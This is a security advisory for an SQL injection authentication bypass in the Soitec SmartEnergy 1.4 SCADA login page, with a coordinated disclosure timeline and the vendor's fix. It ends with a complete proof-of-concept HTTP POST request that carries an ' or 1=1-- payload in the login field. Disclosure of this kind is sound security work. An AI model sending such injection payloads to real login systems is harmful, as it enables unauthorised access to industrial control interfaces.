Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit Vendor: Soitec Product web page: http://www.soitec.com Affected version: 1.4 and 1.3 Summary: Soitec power plants are a profitable and ecological investment at the same time. Using Concentrix technology, Soitec offers a reliable, proven, cost-effective and bankable solution for energy generation in the sunniest regions of the world. The application shows how Concentrix technology works on the major powerplants managed by Soitec around the world. You will be able to see for each powerplant instantaneous production, current weather condition, 3 day weather forecast, Powerplant webcam and Production data history. Desc: Soitec SmartEnergy web application suffers from an authentication bypass vulnerability using SQL Injection attack in the login script. The script fails to sanitize the 'login' POST parameter allowing the attacker to bypass the security mechanism and view sensitive information that can be further used in a social engineering attack. Tested on: nginx/1.6.2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [16.11.2014] Vulnerability discovered. [02.12.2014] Vendor contacted. [08.12.2014] Vendor responds asking more details. [08.12.2014] Sent details to the vendor. [09.12.2014] Vendor confirms the vulnerability. [12.12.2014] Vendor applies fix to version 1.4. [14.12.2014] Coordinated public security advisory released. Advisory ID: ZSL-2014-5216 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php 16.11.2014 --- POST /scada/login HTTP/1.1 Host: smartenergy.soitec.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://smartenergy.soitec.com/scada/login Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 87 csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah # Iranian Exploit DataBase = http://IeDb.Ir [2014-12-15]